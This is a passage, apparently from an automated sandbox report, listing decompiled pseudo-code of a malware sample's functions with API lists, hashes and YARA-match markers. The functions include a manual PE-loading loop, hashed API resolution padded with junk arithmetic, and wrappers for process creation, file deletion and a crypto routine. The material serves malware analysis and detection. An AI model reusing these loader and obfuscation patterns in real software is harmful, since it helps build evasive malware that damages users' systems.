									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}
























                                          0x10001626
                                          0x1000162a
                                          0x1000162e
                                          0x10001631
                                          0x10001637
                                          0x1000163a
                                          0x10001645
                                          0x1000170a
                                          0x10001713
                                          0x1000164b
                                          0x1000164b
                                          0x10001651
                                          0x10001654
                                          0x10001656
                                          0x10001656
                                          0x1000165a
                                          0x100016ab
                                          0x10001718
                                          0x00000000
                                          0x100016ad
                                          0x100016bb
                                          0x100016bf
                                          0x00000000
                                          0x100016c1
                                          0x100016c4
                                          0x100016c6
                                          0x100016cb
                                          0x100016d0
                                          0x100016d2
                                          0x100016d4
                                          0x100016d6
                                          0x100016d9
                                          0x100016db
                                          0x100016de
                                          0x100016de
                                          0x100016d6
                                          0x100016e1
                                          0x00000000
                                          0x100016e1
                                          0x100016bf
                                          0x1000165c
                                          0x1000165f
                                          0x10001664
                                          0x00000000
                                          0x1000166a
                                          0x1000166d
                                          0x1000166f
                                          0x10001674
                                          0x10001677
                                          0x1000167c
                                          0x10001720
                                          0x10001726
                                          0x10001682
                                          0x10001685
                                          0x10001688
                                          0x1000168d
                                          0x1000168f
                                          0x10001693
                                          0x1000169f
                                          0x1000169f
                                          0x1000169f
                                          0x100016e4
                                          0x100016e4
                                          0x100016e7
                                          0x00000000
                                          0x100016e7
                                          0x1000167c
                                          0x10001664
                                          0x00000000
                                          0x100016ed
                                          0x100016f5
                                          0x100016fa
                                          0x100016fd
                                          0x10001700
                                          0x00000000
                                          0x10001656
                                          0x00000000

                                          APIs
                                          • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                          • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocErrorLastVirtual
                                          • String ID:
                                          • API String ID: 497505419-0
                                          • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                          • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                          • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                          • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x006d9772
                                          0x006d9773
                                          0x006d9778
                                          0x006d977a
                                          0x006d977b
                                          0x006d977e
                                          0x006d977f
                                          0x006d9782
                                          0x006d9785
                                          0x006d9788
                                          0x006d9789
                                          0x006d978c
                                          0x006d978f
                                          0x006d9790
                                          0x006d9791
                                          0x006d9794
                                          0x006d9797
                                          0x006d979a
                                          0x006d979d
                                          0x006d97a0
                                          0x006d97a3
                                          0x006d97a6
                                          0x006d97a7
                                          0x006d97a8
                                          0x006d97ad
                                          0x006d97b7
                                          0x006d97c3
                                          0x006d97ca
                                          0x006d97d1
                                          0x006d97d8
                                          0x006d97df
                                          0x006d97e3
                                          0x006d97fc
                                          0x006d9816
                                          0x006d981d

                                          APIs
                                          • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006C602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x006cb569
                                          0x006cb56a
                                          0x006cb56d
                                          0x006cb572
                                          0x006cb574
                                          0x006cb577
                                          0x006cb57a
                                          0x006cb57d
                                          0x006cb580
                                          0x006cb583
                                          0x006cb586
                                          0x006cb587
                                          0x006cb58a
                                          0x006cb58d
                                          0x006cb590
                                          0x006cb593
                                          0x006cb594
                                          0x006cb595
                                          0x006cb59a
                                          0x006cb5a4
                                          0x006cb5b8
                                          0x006cb5c0
                                          0x006cb5c4
                                          0x006cb5cb
                                          0x006cb5d2
                                          0x006cb5d9
                                          0x006cb5e6
                                          0x006cb5fd
                                          0x006cb604

                                          APIs
                                          • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x006d9821
                                          0x006d9822
                                          0x006d9825
                                          0x006d9828
                                          0x006d982a
                                          0x006d982c
                                          0x006d982f
                                          0x006d9832
                                          0x006d9835
                                          0x006d9836
                                          0x006d9837
                                          0x006d983c
                                          0x006d9855
                                          0x006d9858
                                          0x006d985f
                                          0x006d9866
                                          0x006d986d
                                          0x006d9874
                                          0x006d987b
                                          0x006d988e
                                          0x006d989b
                                          0x006d98a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x006d7bf7
                                          0x006d7bf8
                                          0x006d7bfa
                                          0x006d7bfd
                                          0x006d7bff
                                          0x006d7c02
                                          0x006d7c06
                                          0x006d7c07
                                          0x006d7c0f
                                          0x006d7c1d
                                          0x006d7c25
                                          0x006d7c2d
                                          0x006d7c31
                                          0x006d7c38
                                          0x006d7c3f
                                          0x006d7c46
                                          0x006d7c4a
                                          0x006d7c5e
                                          0x006d7c67
                                          0x006d7c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x006cb6f3
                                          0x006cb6f8
                                          0x006cb702
                                          0x006cb70b
                                          0x006cb712
                                          0x006cb719
                                          0x006cb720
                                          0x006cb727
                                          0x006cb72e
                                          0x006cb747
                                          0x006cb759
                                          0x006cb75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x006daa3f
                                          0x006daa40
                                          0x006daa41
                                          0x006daa44
                                          0x006daa47
                                          0x006daa4b
                                          0x006daa4c
                                          0x006daa51
                                          0x006daa5b
                                          0x006daa64
                                          0x006daa68
                                          0x006daa6f
                                          0x006daa76
                                          0x006daa8d
                                          0x006daa90
                                          0x006daa9d
                                          0x006daaa8
                                          0x006daaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                          0x1000745a
                                          0x1000745c
                                          0x1000745e
                                          0x10007460
                                          0x10007468

                                          APIs
                                          • _doexit.LIBCMT ref: 10007460
                                            • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                            • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                            • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                            • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                            • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                          • String ID:
                                          • API String ID: 3712619029-0
                                          • Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                          • Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
                                          • Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                          • Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 006C9FDC, Relevance: 39.5, Strings: 31, Instructions: 734COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006C9FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E006C602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
